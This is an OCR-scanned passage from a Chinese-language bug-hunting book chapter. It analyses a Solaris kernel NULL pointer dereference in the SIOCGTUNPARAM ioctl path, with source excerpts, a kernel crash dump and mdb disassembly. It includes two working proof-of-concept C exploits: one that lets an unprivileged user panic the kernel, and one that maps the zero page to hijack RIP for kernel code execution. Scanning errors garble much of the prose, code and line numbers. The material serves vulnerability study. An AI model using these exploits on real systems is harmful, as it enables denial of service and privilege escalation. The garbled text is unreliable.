26692 void 
26693 ip process ioctl(ipsq t *ipsq, queue t *q, mblk t *mp, void *arg) 
26694 { 
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[ +] 

26717 ci.ci ipif = NULL; 
[ 

26735 case TUN CMD: 


26736 p 

26737 * SIOC[GS]TUNPARAM appear here. ip extract tunreq returns 
26738 * a refheld ipif in ci.ci ipif 

26739 ui 

26740 err = ip extract tunreq(q, mp, &ci.ci ipif, ip process ioctl); 


当 一 个 SIOCGTUNPARAM IOCTL tok AIK SIAN KIN, PK ip process ioctl() 
得 以 调用 。 第 26717 fT, ci.ci ipif 的 值 直 接 设 为 NULL。 因 为 是 SIOCGTUNPARAM 
IOCTL 调用 ， 所 以 选择 执行 switch case 语句 TUN CMD ( 见 第 26735 行 )， 调 用 
PKŠ ip extract tunreq() ( W 2674077 ). 


源 代 码 文 件 ”uts/common/inet/ip/ip if.c 
函数 ip extract tunreq() ! 


[..] 
8158 /* 
8159 * Parse an iftun req structure coming down SIOC[GS]TUNPARAM ioctls, 
8160 * refhold and return the associated ipif 

8161 */ 

8162 /* ARGSUSED */ 

8163 int 

8164 ip extract tunreq(queue t *q, mblk t *mp, const ip ioctl cmd t *ipip, 
8165 cmd info t *ci, ipsq func t func) 

8166 1 

8167 boolean t exists; 

8168 struct iftun req *ta; 

8169 ipif t "IDE 


8170 ill t *ill; 

8171 boolean t isv6; 

8172 mblk_t mp; 

8173 int error; 

8174 conn t *connp; 

8175 ip_stack_t *ipst; 

8176 

8177 /* Existence verified in ip wput nondata */ 

8178 mp1 - mp-»b cont-»b cont; 

8179 ta = (struct iftun req *)mpi-»b rptr; 

8180 /* 

8181 * Null terminate the string to protect against buffer 
8182 * overrun. String was generated by user code and may not 
8183 * be trusted. 

8184 2 

8185 ta-»ifta lifr name[LIFNAMSIZ - 1] = '\o'; 

8186 


8187 connp = Q TO CONN(q); 
8188 isv6 = connp-»conn af isv6; 
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8189 ipst = connp-»conn netstack-»netstack ip; 


8191 /* Disallows implicit create */ 

8192 ipif = ipif lookup on name(ta-»ifta lifr name, 

8193 mi strlen(ta-»ifta lifr name), B FALSE, &exists, isv6, 

8194 connp-»conn zoneid, CONNP TO WO(connp), mp, func, &error, ipst); 


第 8178 行 引用 了 一 个 链接 的 STREAMS 消息 块 ， 到 了 第 8179 行 ， 用 户 控制 
的 IOCTL 数据 填充 结构 体 tas 之 后 , 调用 函数 ipif lookup on name()( 见 第 8192 
ÍT ); PRI ipif_lookup_on_name() 的 前 两 个 参数 来 目 结构 体 ta 中 的 用 户 控制 数据 。 








源 代 码 文 件 ”uts/common/inet/ip/ip if.c 
函数 ”ipif lo okup on name() 


[..] 


19116 /* 

19117 * Find an IPIF based on the name passed in. Names can be of the 

19118 * form «phys» (e.g., leo), <phys>:<#> (e.g., 1e0:1), 

19119 * The «phys» string can have forms like <dev><#> (e.g., leo), 

19120 * <dev><#>.<module> (e.g. leO.foo), or <dev>.<module><#> (e.g. ip.tun3). 
19121 * When there is no colon, the implied unit id is zero. «phys» must 

19122 * correspond to the name of an ILL. (May be called as writer.) 

19123 */ 


19124 static ipif t * 
19125 ipif lookup on name(char *name, size t namelen, boolean t do alloc, 


19126 boolean t *exists, boolean t isv6, zoneid t zoneid, queue t *q, 
19127 mblk t *mp, ipsq func t func, int *error, ip stack t *ipst) 
19128 ( 

[..] 

19138 if (error != NULL) 

19139 *error = 0; 


[ ] 

19154 /* Look for a colon in the name. */ 
19155 endp = &name[namelen]; 

19156 for (cp = endp; --cp > name; ) ( 


19157 if (*cp -- IPIF SEPARATOR CHAR) 

19158 break; 

19159 } 

19160 

19161 if (*cp -- IPIF SEPARATOR CHAR) ( 

19162 Ee 

19163 * Reject any non-decimal aliases for logical 
19164 * interfaces. Aliases with leading zeroes 

19165 * are also rejected as they introduce ambiguity 
19166 * in the naming of the interfaces. 

19167 * In order to confirm with existing semantics, 
19168 * and to not break any programs/script relying 
19169 * on that behaviour, if«0»:0 is considered to be 
19170 * a valid interface. 

19171 ji 

19172 * If alias has two or more digits and the first 
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19173 * is zero, fail. 

19174 */ 

19175 if (&cp[2] < endp && cp[1] == '0') 
19176 return (NULL); 

19177 } 


51913977, error 的 值 被 直接 设 为 0。 然后 在 第 19161 行 ， 检 查 用 户 控 制 的 























IOCTL 数据 所 提供 的 接口 名 中 是 否 有 冒号 ( IPIF SEPARATOR CHAR 定 ee 冒号 )。 
如 果 在 接口 名 中 找到 冒号 ， 冒 号 后 面 的 字符 便 被 视 为 接口 别名 。 如 果 一 个 别名 e 
两 个 或 两 个 以 上 的 数字 并 且 第 一 个 数字 是 0(ASCI 字符 0 或 十 六 进 制 的 0x30, 


第 19175 11), PKŠ ipif lookup_on_name() 返 回 到 果 数 ip extract tunreq(), 
值 为 NULL， 而 变量 error 的 值 仍 为 (ULES 19139 行 和 第 19176 17 )。 

源 代码 文件 ”uts/common/inet/ip/ip if.c 

ey 3% ip extract tunreq() 

[..] 


8192 ipif = ipif lookup on name(ta-»ifta lifr name, 


8193 mi strlen(ta-»ifta lifr name), B FALSE, &exists, isv6, 
Q4071 | | | rcnnnn-soconn 70nnei i2. CONND TO WOlronnp Y fi Qarror ct\- 
OLDS CVUTIip™ »conn _eVlieiuy CWUININI — [| V WNVNVMCMIIIHP J 3 mp , [| unc, 《AL 上 AL 3 ips Lj» 


8195 if (ipif == NULL) 
8196 return (error); 


[ 


HA PRIA ip extract tunreq()， 如 有 果 ipif lookup on name() 返 回 NULL, 1H 
EF ipif 设 为 NULL ( 见 第 8192 行 )。 因 为 ipif 是 NULL， 第 8195 77H if no 
TRUE, HÍT 8196 fT. PEZ ip extract tunreq() 返 回 至 ip process ioctl(), 
回 值 error 4523 0. 


源 代 码 文 件 uts/common/inet/ip/ip.c 


eKA ip process ioctl() 


26717  ci.ci ipif - NULL; 


26735 case TUN CMD: 


26736 i 

26737 * SIOC[GS|TUNPARAM appear here. ip extract tunreq returns 
26738 * a refheld ipif in ci.ci_ipif 

26739 2f 

26740 err - ip extract tunreq(q, mp, &ci.ci ipif, ip process ioctl); 
26741 if (exr !- o) ( 


26742 ip ioctl finish(q, mp, err, IPI2MODE(ipip), NULL); 
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26743 return; 
26744 } 
[..] 
26788 err = (*ipip->ipi func)(ci.ci ipif, ci.ci sin, q, mp, ipip, 
26789 ci.ci lifr); 


看 函数 ip process ioct1()， 因 为 ip extract tunreq() 返 回 值 是 0 ( 见 第 26740 
ÍT), 变量 err 的 值 设 为 0。 又 因为 err 等 于 0, 第 26741 行 的 if 语句 返回 FALSE, 
第 26742 和 26743 行 没有 执行 。 第 26788 行 ，ipip->ipi func 指向 的 函数 (这 里 
是 图 数 ip sioctl tunparam() ) 被 调用 , 第 一 个 参数 ci.ci ipif 仍 设 置 为 NULL( 见 
第 26717 ÍT )。 


源 代码 文件 ”uts/common/inet/ip/ip if.c 


函数 ip sioctl tunparam() 


9401 int 

9402 ip sioctl tunparam(ipif t *ipif, sin t *dummy sin, queue t *q, mblk t *mp, 
9403 ip ioctl cmd t *ipip, void *dummy ifreq) 

9404 1 


[..] 
9432 ill = ipif->ipif ill; 
[ 


因为 函数 ip sioctl tunparam() 的 第 一 个 参数 是 NULL, $ 9432 行 的 引用 
ipif-»ipif ill 可 表示 为 NULL->ipif il1l1， 这 是 一 个 典型 的 空 指针 解 引 用 。 如 果 
这 个 空 指针 解 引 用 触发 ， 整 个 系统 将 会 因 一 个 内 核 错误 (kernel panic ) MIU o 
(更 多 关于 空 指 针 解 引用 的 信息 见 A.2 市 。) 
到 目前 为 止 ， 结 果 总 结 如 下 。 
O 一 个 Solaris 系统 的 非特 权 用 户 (unprivilegeduser ) 可 以 调用 SIOCGTUNPARAM 
IOCTL ( 见 图 3-3 中 的 (1) )。 
a 如 果 这 个 传 给 内 核 的 IOCTL 数据 被 精心 加 工 过 ( 其 中 必须 有 一 个 接口 名 包 
仿冒 号 并 坚 跟 字符 0 和 一 个 任意 数字 )， 束 可 能 触发 空 指针 解 引 用 ( 见 图 
3-3 的 (2) )， 从 而 导致 系统 崩溃 ILEI 3-3 中 的 (3) )。 
但 是 为 什么 这 惑 会 触发 空 指针 解 引 用 呢 ? 到 底 是 哪里 的 编程 错误 导致 了 这 个 
bug? 
问题 出 在 ipif_lookup_on_name() 没 有 设置 适当 的 错误 状态 就 被 迫 返 回 它 的 调 
用 函数 。 
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这 个 bug 的 存在 部 分 原因 是 函数 ipif lookup_on name() 通 过 两 条 不 同 路 径 问 
它 的 调用 者 返回 错误 状态 :通过 函数 的 返回 值 ( return (null) ) 以 及 通过 变量 error 
(*error != 0 )。 每 次 调用 这 个 函数 时 ， 内 核 代 码 的 作者 必须 确保 这 两 个 错误 状态 
ENTRETIEN PRIA FETE WARK (EL (evaluate), IHE TET ME. PUR 
推荐 这 么 做 。 本 昔 所 描述 的 漏洞 就 是 从 这 样 的 代码 中 产生 此 类 问题 的 极 好 例子 。 














A È 
Interface name * ocn i e (2) (3) 
O1* IOCTL 请 
NULL -»ipif ill 


P 


Al 3-3 到 目前 为 止 的 结果 总 结 。 在 Solaris AKA, — 4E REBUH FP 
可 触发 空 指针 解 引 用 而 导致 系统 骨 演 


源 代 码 文 件 uts/common/inet/ip/ip if.c 
ej 3% ”ipif lookup on name() 
[..] 


19124 static ipif t * 
19125 ipif lookup on name(char *name, size t namelen, boolean t do alloc, 


19126 boolean t *exists, boolean t isv6, zoneid t zoneid, queue t *q, 
19127 mblk t *mp, ipsq func t func, int *error, ip stack t *ipst) 
19128 ( 
[..] 
19138 if (error != NULL) 
19139 *error = 0; 
Le] 
19161 if (*cp == IPIF SEPARATOR CHAR) { 
19162 m 
19163 * Reject any non-decimal aliases for logical 
19164 * interfaces. Aliases with leading zeroes 
19165 * are also rejected as they introduce ambiguity 
19166 * in the naming of the interfaces. 
19167 * In order to confirm with existing semantics, 
19168 * and to not break any programs/script relying 
19169 * on that behaviour, if«0»:0 is considered to be 
* a valid interface. 


19170 





3.1 发 现 漏洞 | 33 
19171 T 
19172 * If alias has two or more digits and the first 
19173 * is zero, fail. 
19174 "f 
19175 if (&cp[2] < endp && cp[1] == '0') 
19176 return (NULL); 
19177 
[ 


第 19139 行 , 两 种 错误 状态 之 一 的 变量 error 值 直 接 设 为 0。 错 误 状 态 0 意味 
者 到 目前 为 止 没 有 发 生 错误 。 在 接口 名 中 提供 一 个 冒号 并 紧 跟 字符 0 和 一 个 任意 
数字 ， 将 会 触发 第 19176 行 的 代码 ， 从 而 导致 它 返 回调 用 函数 。 问 题 是 在 函数 返 
回 前 error 没有 设置 为 有 效 的 错误 状态 。 所 以 ipif_lookup_on_name() 返 回 至 
ip extract tunreq() 时 error 的 值 仍 为 0。 








源 代 码 文 件 ”uts/common/inet/ip/ip if.c 
ey 3X ip extract tunreq() 


[..] 


8192 ipif = ipif lookup on name(ta->ifta lifr name, 


8193 mi strlen(ta->ifta lifr name), B FALSE, &exists, isv6, 

8194 connp-»conn zoneid, CONNP TO WO(connp), mp, func, &error, ipst); 
8195 if (ipif -- NULL) 

8196 return (error); 


[..] 
[a] $ PR Zt ip extract tunreq(). IRIRA In SB) PRX ip process - 
ioctl() ( 见 第 8196 17 ). 
源 代 码 文 件 uts/common/inet/ip/ip.c 
函数 ip process ioctl() 


[..] 
26735 case TUN CMD: 


26736 p 

26737 * SIOC[GS]|TUNPARAM appear here. ip extract tunreq returns 
26738 * a refheld ipif in ci.ci ipif 

26739 ey 

26740 err = ip extract tunreq(q, mp, &ci.ci ipif, ip process ioctl); 
26741 if (exr !- o) ( 

26742 ip ioctl finish(q, mp, err, IPI2MODE(ipip), NULL); 
26743 return; 

26744 

[..] 

26788 err = (*ipip->ipi_func)(ci.ci_ipif, ci.ci_sin, q, mp, ipip, 


26789 ci.ci_lifr); 
[ 
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然后 在 ip_process_ioct1() 咀 数 中 ,错误 状态 仍然 为 0。 因 此, 第 26741 行 的 
if 语句 返回 FALSE， 内 核 继续 执行 函数 的 剩余 部 分 ， 守 致 ip sioctl tunparam() 
PRCA AS Fg ET AES A o 

多 有 意思 的 一 个 bug 啊 ! 

图 3-4 总 结 了 这 个 空 指针 解 引 用 bug 涉 及 的 函数 调用 关系。 





(1) (2) 
ip process ioctl() < ip extract tunreq() > ipif lookup. on. name() 
(4) (3) 


(5) 
ip_sioctltunparaw() 
(6) 


宗 指 针 解 引用 





图 3-4 ”调用 图 总 结 空 指针 解 引用 bug 涉及 的 函数 调用 关系 。 数 字 指 事件 





的 时 间 顺 序 
3.2 is: FH 
利用 这 个 bug 是 个 令 人 激动 的 挑战 。 空 指针 本 章 中 我 使 用 的 平台 是 


解 引 用 通常 被 打上 不 可 利用 的 标签 ， 因 为 他 们 通 Solis 10 10/08 x86/x64 DVD & 
常 被 用 于 拒绝 服务 攻击 而 不 是 任意 代码 执行 。 然 E PUEDES B olios- 
而 ， 这 个 空 指针 解 引用 不 一 样 ， 它 可 以 被 成 功利 9) 如 朋 Solaris 10 
用 ， 在 内 核 级 实现 任意 代码 执行 。 

为 了 利用 这 个 漏洞 ， 我 执行 以 下 步骤。 

(D 触发 这 个 空 指针 解 引用 ， 实 现 拒绝 服务 。 

(2) 利用 零 页 内 存 控制 EIP/RIP。 


Generic_l?7138—09. 





3.2.1 第 一 步 : 触发 这 个 空 指 针 解 引 用 ， 实 现 拒绝 服 务 
为 了 触发 这 个 空 指针 解 引 用 ， 我 写 了 以 下 概念 验证 代码 〈 见 代码 清单 3-1 )。 
代码 清单 31 ”概念 验证 代码 ， 用 来 触发 在 Solaris 中 发 现 的 空 指针 解 引 用 bug (poc.c ) 


01 #include <stdio.h> 
02 #include «fcntl.h» 
03 #include «sys/syscall.h» 
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04 #include «errno.h» 
05 #include <sys/sockio.h> 
06 #include <net/if.h> 


07 

08 int 

09 main (void) 

10 { 

11 int Td = 03 

12 char data[ 32]; 

13 

14 fd = open ("/dev/arp", O RDWR); 

15 

16 if (fd < 0) 4 

17 perror ("open"); 

18 return 1; 

19 } 

20 

21 // IOCTL data (interface name with invalid alias ":01") 
22 data[0] = 0x3a; // colon 

23 data[1] = 0x30; // ASCII zero 

24 data[2] = 0x31; // digit 1 

25 data[3] = 0x00; // NULL termination 
26 

27 // IOCTL call 

28 syscall (SYS ioctl, fd, SIOCGTUNPARAM, data); 
29 

30 printf ("poc failed\n"); 

31 close (fd); 

32 

33 return 0; 

34 } 


IX ES POC 代码 先 打开 内 核 的 网 络 设备 /dewarp( 见 第 1477 ) 注意 设备 /dev/tcp 
和 /dev/udp 都 支持 SIOCGTUNPARAM IOCTL， 因 此 都 可 以 用 来 替代 /dev/arp。 接 下 来 ， 
准备 IOCTL 数据 (ULES 22 行 至 第 25 77). 由 高 有 无 效 别名 :01 的 接口 名 组 成 的 数 
据 触 发 了 这 个 bug。 最 后 ， 调 用 SIOCGTUNPARAM IOCTL, 将 IOCTL 数据 发 送 给 内 
核 ( 见 第 28 行 )。 

然后 在 64 位 的 Solaris 10 系统 上 编译 并 以 一 个 非特 权 用 户 吴 份 测试 这 个 POC 
程序 。 








solaris$ isainfo -b 
64 


solaris$ id 

uid-100(wwwuser) gid=1(other) 

solaris$ uname -a 

SunOS bob 5.10 Generic 137138-09 i86pc 1386 i86pc 
solaris$ /usr/sfw/bin/gcc -m64 -o poc poc.c 


solaris$ ./poc 
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系统 立刻 朋 演 并 重启 ,重启 后 , 用 root 身份 登录 并 在 Solaris Modular Debugger 
(mdb ) “的 帮助 下 检查 内 核 前 省 文件 (以 下 调试 命令 的 详细 描述 见 B.1 节 )。 


solaris# id 
uid=0(root) gid=0(root) 


solaris# hostname 
bob 


solaris# cd /var/crash/bob/ 


solaris# ls 
bounds unix.O vmcore.O 


solaris# mdb unix.O vmcore.O 

Loading modules: [ unix krtld genunix specfs dtrace cpu.generic uppc pcplusmp ufs ip 
hook neti sctp arp usba fcp fctl nca lofs mpt zfs random sppp audiosup nfs ptm md 
cpc crypto fcip logindmux | 


H: :msgbuf 调试 命令 显示 消息 缓冲 区 的 内 容 ， 包 括 到 内 核 错 误 之 前 的 所 有 控 
制 台 消息 。 


> ::msgbuf 


[..] 

panic[cpuo]/thread-ffffffff87d14320: 

BAD TRAP: type-e (#pf Page fault) rp=fffffe8000f7e5a0 addr=8 occurred in module "ip" 
due to a NULL pointer dereference 


poc: 
#pf Page fault 

Bad kernel fault at addr=0x8 

pid-1380, pc-oxfffffffff6314c7c, sp-Oxfffffe8000f7e690, eflags=0x10282 
cro: 80050033«pg,wp,ne,et,mp,pe» cr4: 6bO«xmme,fxsr,pge,pae,pse» 

Cr2: 8 cr3: 21a2a000 cr8: C 


rdi: O rsi: ffffffff86bc0700 rdx: ffffffff86bcooc8 
rex: O r8: fffffffffbdofdf8 r9: fffffe8000f7e780 
rax: c rbx: ffffffff883ff200 rbp: fffffe8000f7e6d0 
rig: i rii: 0 r12: ffffffff8661f380 
r13: 0 r14: ffffffff8661f380 r15: ffffffff819f5b40 
fsb: fffffd7fff220200 gsb: fffffffffbc27fco ds: 0 
es: 0 fs: 1bb gs: 0 
trp: e err: O rip: fffffffff6314c7c 
CS : 28 rfl: 10282 rsp: fffffe8000f7e690 
SS: 30 


fffffe8000f7e4bO unix:die«da () 
fffffe8000f7e590 unix:trap+5e6 () 
fffffe8000f7e5a0 unix: cmntrap+140 () 
fffffe8000f7e6dO ip:ip sioctl tunparame5c () 
fffffe8000f7e780 ip:ip process ioctl«280 () 
fffffe8000f7e820 ip:ip wput nondata+970 () 
fffffe8000f7e910 ip:ip output _options+537 () 
fffffe8000f7e920 ip:ip output+10 () 
fffffe8000f7e940 ip:ip wput+37 () 
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fffffe8000f7e9a0 unix: putnext+1f1 () 
fffffe8000f7e9dO0 arp:ar wput+9d () 
fffffe8000f7ea30 unix: putnext+1f1 () 
fffffe8000f7eabo genunix:strdoioctl467b () 
fffffe8000f7eddO genunix:strioctl4620 () 
fffffe8000f7edfO specfs:spec ioctl467 () 
fffffe8000f7ee20 genunix:fop ioctl425 () 
fffffe8000f7efO00 genunix:ioctl+ac () 
fffffe8000f7ef10 unix:brand sys syscall+21d () 


syncing file systems... 


done 
dumping to /dev/dsk/cOdOs1, offset 107413504, content: kernel 


i aH mm. ARATE EE A T JE 0xfffffffff6314c7c 处 的 空 
HF fft HR] CI, RIP AFA )。 接 下 来 ， 让 调试 硕 显 示 那 个 地 址 处 的 指令 。 


> Oxfffffffff6314c7c::dis 


ip sioctl tunparam+0x30: jg +0xf0 «ip sioctl tunparam+0x120> 
ip sioctl tunparam«0x36: movq — Ox28(Xr12),Xrax 

ip sioctl tunparam«ox3b: movq O0x28(%rbx) , %rbx 

ip sioctl tunparam+0x3f: movq 4%Y12,4rdi 

ip sioctl tunparam+0x42: movb $0xe,0x19(%rax) 

ip sioctl tunparam+0x46: call +0x5712cfa «copymsg» 

ip sioctl tunparam+0x4b: movq — 4raX,^r15 

ip sioctl tunparam+0x4e: movl $0xc,4eax 

ip sioctl tunparam+0x53: testq %r15,%r15 

ip sioctl tunparam+0x56: je +0x9d «ip sioctl tunparam+0xf3> 
ip sioctl_tunparam+0x5c: movq — Ox8(Xr13),Xr14 


[..] 


fitz HH ip sioctl tunparam«ox5c 地 址 处 的 指令 movq 0x8(%r13),%r14 导致 
的 。 这 条 指令 试图 引用 寄存 硕 x13 指 回 的 值 。 正 如 调试 需 在 ::msgbuf 命令 下 的 输出 
显示 , 系统 表演 时 r13 的 值 是 0。 所 以 这 条 汇编 指令 就 对 应 于 ip sioctl tunparam() 
为 数 中 发 生 的 空 指针 解 引 用 〈 见 以 下 代码 段 的 第 9432 11 )。 








源 代 码 文 件 ”uts/common/inet/ip/ip if.c 
函数 ip sioctl tunparam() 


[..] 

9401 int 

9402 ip sioctl tunparam(ipif t *ipif, sin t *dummy sin, queue t *q, mblk t *mp, 
9403 ip ioctl cmd t *ipip, void *dummy ifreq) 

9404 1 

[..] 

9432 ill = ipif-»ipif ill; 

[ 
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我 能 演示 这 个 bug 可 以 被 一 个 非特 权 用 户 成 功利 用 并 使 系统 朋 溃 。 因 为 所 有 
的 Solaris 区 域 ( Solaris Zones ) 共 至 同一 个 内 核 ， 也 就 可 能 使 得 整个 系统 ( 所 有 
的 区 域 ) Biss, 即使 这 个 漏洞 只 是 在 一 个 非特 权 、 非 全 局 区 域 中 触发 (关于 Solaris 
Zones 分 区 技术 的 更 多 信息 见 C.3  )。 如 宁 被 某 人 恶意 利用 ， 任 何 使 用 Solaris 
Zones 分 区 技术 的 托管 服务 供应 商都 可 能 受到 极 大 的 影 啊 。 








3.2.2 第 二 步 : 利用 零 页 内 存 控 制 EIP/RIP 


能 使 系统 骨 淡 之 后 ， 我 决定 尝试 任意 代码 执行 。 为 此 ， 必 须 解 决 以 下 两 个 
问题 : 

a 空 指 针 解 引用 触发 时 阻止 系统 月 演 ; 

口 控制 EIP/RIP。 

系统 朋 溃 是 由 空 指针 解 引 用 导致 的 。 因 为 零 页 (或 NULL 页 ) 内 存 通 第 没有 
映射 ， 解 引用 就 导致 了 非法 访问 ， 由 此 系统 月 溃 〈 见 A.2 市 )。 为 阻止 系统 月 淡 ， 
需要 做 的 是 在 空 指针 解 引 用 之 前 映射 去 页 内 存 。 这 在 x86 和 AMD64 体系 结构 上 
很 容易 做 到 ， 因 为 在 这 些 平台 上 Solaris 把 进程 的 虚拟 地 址 空间 分 成 两 部 分 : 用 户 
空间 和 内 核 空 间 (DLAI 3-5 )。 所 有 用 户 态 应 用 程序 运行 在 用 户 空间 ， 内 核 以 及 内 
核 扩 展 ( 例如 驱动 程序 ) 运行 在 内 核 空 间 。 然 而 ， 内 核 和 进程 的 用 户 空间 共享 相 
AIRRA. 


ALKETT T ud BORA 





























OxFFFFFFFF.FFFFFFFF 


rh) E 16) LASE 


OxFFFFFD80.00000000 
解 引 用 不 会 导 
BY dE st ib 19) 


WE ol Fe E E 
非法 访问 


用 户 空 间 用 户 空间 





0x00000000.00000000 


HDRT ARI HPO ee (已 映射 》 


图 3-5 一 个 进程 的 虚拟 地 址 空间 ( 64 位 Solaris x86 ) ''?! 
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注意 ”每 个 特定 进程 的 用 户 态 地 址 空间 是 唯一 的 ,而 内 核 地 址 空间 是 所 有 进程 共 
享 的 。 在 一 个 进程 中 映射 NULL 页 仅仅 是 在 那个 进程 的 地 址 空间 里 映射 。 





在 触发 空 指针 解 引 用 之 前 映射 零 页 内 存 ， 就 能 够 阻止 系统 天 汗 。 下 一 个 问题 
是 : 如 何 控制 EIP/RIP? 我 所 能 控制 的 数据 只 有 传 给 内 核 的 IOCTL 数据 和 传 给 进 
程 的 用 户 空间 数据 ， 包 括 零 页 内 存 。 获 得 控制 的 唯一 方法 是 让 内 核 引 用 采 些 零 页 
内 存 上 的 数据 , 之 后 这 些 数据 可 用 来 控制 内 核 的 执行 流 。 我 想 这 个 方法 可 能 不 行 ， 
但 是 我 错 了 。 





源 代码 文件 ”uts/common/inet/ip/ip if.c 
函数 ip sioctl tunparam() 


[..] 

9401 int 

9402 ip sioctl tunparam(ipif t *ipif, sin t *dummy sin, queue t *q, mblk t *mp, 
9403 ip ioctl cmd t *ipip, void *dummy ifreq) 


OANA 了 
J4U^4a l 


[..] 

9432 ill = ipif-»ipif ill; 

9433 mutex enter(&connp-»conn lock); 

9434 mutex enter(&ill->ill lock); 

9435 if (ipip-»ipi cmd == SIOCSTUNPARAM || ipip->ipi cmd == OSIOCSTUNPARAM) { 


9436 success = ipsq pending mp add(connp, ipif, CONNP TO WO(connp), 
9437 mp, 0); 

9438 } else { 

9439 success = ill pending mp add(ill, connp, mp); 
9440 

9441 mutex exit(8ill-»ill lock); 

9442 mutex exit(&connp-»conn lock); 

9443 

9444 if (success) ( 

9445 ipidbg(("sending down tunparam request ")); 
9446 putnext(ill-»ill wq, mp1); 


[ 


当 ipif 被 强制 设 为 NULL 时 ， 第 9432 行 发 生 空 指针 解 引 用 ， 这 导致 了 系统 朋 
溃 。 但 是 如 果 空 指针 解 引 用 之 前 映射 了 零 页 内 存 ， 就 不 会 触发 这 个 非法 访问 ， 系 
WLAN Sait ST. FAR, WTA ARS TAAA ed oe a, ill Zh 
构 体 的 值得 以 确定 。 因 此 ， 通 过 仔细 构造 零 页 内 存 数据 ， 就 可 以 控制 ill 结构 体 
所 有 成 员 的 值 。 我 很 高 兴 地 发 现 ， 第 9446 fH T PRX putnext() ， 参 数 之 一 是 
来 目 用 户 探 制 数据 的 ill-»ill wq. 
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源 代码 文件 ”uts/common/os/ip/putnext.c 
函数 ”putnext () P 
[..] 


146 void 

147 putnext(queue t *qp, mblk t *mp) 
148 1 

[..] 

154 int (*putproc)(); 
[..] 

17 qp = qp-?q next; 

177 sq = qp-»q syncq; 

178 ASSERT(sq {= NULL); 


179 ASSERT(MUTEX NOT HELD(SOLOCK(sq))); 
180 qi = qp->q_qinfo; 
[..] 


26 I" 

269 * We now have a claim on the syncq, we are either going to 
270 * put the message on the syncq and then drain it, or we are 
271 * going to call the putproc(). 

272 */ 


273 putproc = qi->qi_putp; 
274 if (!queued) { 


275 STR FTEVENT MSG(mp, fqp, FTEV PUTNEXT, mp-»b rptr - 
276 mp-»b datap-»db base); 
ue (*putproc)(qp, mp); 


FAP np Esel PRA putnext0 第 一 个 参数 的 数据 ， 这 意味 着 qp. sq 和 gi 
的 值 也 都 可 以 通过 零 页 内 存 映射 的 数据 来 控制 ( 见 第 176、177 和 180 行 )。 此 外 ， 
用 户 能 控制 第 154 行 声明 的 函数 指针 的 值 ( 见 第 273 行 ), 之 后 , 第 277 行 调用 了 
这 个 也 数 指针 。 

所 以 ， 总 的 来 说 ， 如 果 精 心 构 造 零 页 内 存 的 映 映 数 据 ， 就 可 以 控制 一 个 丽 数 
指针 ， 从 而 完全 控制 EIP/RIP， 在 内 核 级 别 实现 任意 代码 执行 。 

我 用 如 下 的 POC 代码 控制 EIP/RIP。 








代码 清单 3-2 ”用 来 控制 EIP/RIP、 从 而 在 内 核 级 别 实现 任意 代码 执行 的 POC 
代码 ( poc2.c ) 


01 #include «string.h» 

02 #include <stdio.h> 

03 #include <unistd.h> 

04 #include «fcntl.h» 

05 #include «sys/syscall.h» 
06 #include <sys/sockio.h> 
07 #include «net/if.h» 

08 #include «sys/mman.h» 


10 IIT PB B BET PEE P E LEE NA 
11 // Map the zero page and fill it with the 

12 // necessary data 

13 int 

14 map null page (void) 


15 { 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25 
26 
27 
28 
29 
30 
31 
32 
33 


void * mem - (void *)-1; 


// map the zero page 


mem - mmap (NULL, PAGESIZE, PROT EXEC|PROT READ|PROT WRITE, 
MAP FIXED|MAP PRIVATE|MAP ANON, -1, O); 


if (mem != NULL) 1 
printf ("failed\n"); 
fflush (0); 
perror ("[-] ERROR: mmap"); 
return 1; 


} 


// fill the zero page with zeros 
memset (mem, 0x00, PAGESIZE); 


LILLIE LLIE 
// zero page data 


// qi->qi putp 
*(unsigned long long *)0x00 


0x0000000041414141; 


// ipif-»ipif ill 
*(unsigned long long *)0x08 = 0x0000000000000010; 


// start of ill struct (ill-»ill ptr) 
*(unsigned long long *)0x10 = 0x0000000000000000; 


// ill-»rq 
*(unsigned long long *)0x18 = 0x0000000000000000; 


// ill-»wq (sets address for qp struct) 
*(unsigned long long *)0x20 = 0x0000000000000028; 


// start of qp struct (qp-»q info) 
*(unsigned long long *)0x28 = 0x0000000000000000; 


// qp-»q first 
*(unsigned long long *)0x30 = 0x0000000000000000; 


// qp-»q last 
*(unsigned long long *)0x38 = 0x0000000000000000; 


// qp-»q next (points to the start of qp struct) 
*(unsigned long long *)0x40 = 0x0000000000000028; 


// qp-»q syncq 
*(unsigned long long *)OxaO = 0x00000000000007d0; 


return 0; 


32 ”漏洞 利用 | 41 


42 | 第 3 章 突破 区 域 限 制 


67 

68 void 

69 status (void) 

70 { 

71 unsigned long long i = 0; 

72 

73 printf ("[+] PAGESIZE: %d\n", (int)PAGESIZE); 

74 printf ("[+] Zero page data:\n"); 

15 

76 for (i = 0; i <= 0x40; i += 0x8) 

77 printf ("... Ox%02x: 0x401611x\n", i, *(unsigned long long*)i); 
78 

79 printf ("... Oxa0: 0x%01611x\n", *(unsigned long long*)oxa0); 
80 

81 printf ("[+] The bug will be triggered in 2 seconds..\n"); 
82 

83  fflush (0); 

84 } 

85 

86 int 

87 main (void) 

88 

89 int fd -0;; 

90 char data[32]; 

91 

92. SALUL AAAH 
93  // Opening the '/dev/arp' device 

94 printf ("[+] Opening '/dev/arp' device .. "); 

95 

96 fd = open ("/dev/arp", O_RDWR); 

97 

98 if (fd< 0) ( 

99 printf ("failed\n"); 

100 fflush (0); 

101 perror ("[-] ERROR: open"); 

102 return 1; 

103 } 

104 

105 printf ("OK\n"); 

106 

107 SULU U UA U M 
108 // Map the zero page 

109 printf ("[+] Trying to map zero page .. "); 

110 

111 if (map null page () == 1) { 

112 return 1; 

113 | 

114 

115 printf ("OK\n"); 

116 

117  JHTIPBPHTIHITHITIEEHHEHTEDEHTEEEHEEEHEEHEHEEIEE 
118 — // Status messages 
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119 status (); 

120 sleep (2); 

121 

122  IIIIPIIPILIIIELHIHTEFITITITIHEPEEHIEEHIPEHITEHFEILTI 

123  // IOCTL request data (interface name with invalid alias ':01') 
124 data[0] = 0x3a; // colon 


125  data[1] = 0x30; // ASCII zero 

126 data[2] = 0x31; // the digit '1' 
127  data[3] = 0x00; // NULL termination 
128 


129 /VIMMMMMMMIEELILTL(CLWAWMMPMMl l l LC CoL AT ATT ATT TAT 

130  // IOCTL request 

131  syscall (SYS ioctl, fd, SIOCGTUNPARAM, data); 

132 

133 printf ("[-] ERROR: triggering the NULL ptr deref failed\n"); 
134 close (fd); 

155 

136 return 0; 

137 ] 


代码 清单 3-2 的 第 1947, ZOLA EB mmap() eK CHR, {Abie POC fX 
